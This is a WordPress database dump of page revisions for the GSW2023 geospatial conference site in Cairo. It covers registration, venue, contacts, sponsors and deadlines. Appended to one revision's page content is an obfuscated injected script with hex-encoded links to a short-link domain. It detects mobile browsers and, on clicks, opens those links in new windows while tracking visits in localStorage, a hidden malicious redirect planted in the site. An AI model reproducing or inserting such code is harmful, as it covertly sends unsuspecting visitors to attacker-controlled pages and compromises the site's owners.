!important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772244735{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis, Cairo, Egypt.t. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-29 12:44:12','2023-04-29 12:44:12','',3066,'https://gsw2023.com/?p=4134',0,'revision','',0),
(4135,1,'2023-04-29 12:44:44','2023-04-29 12:44:44','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" 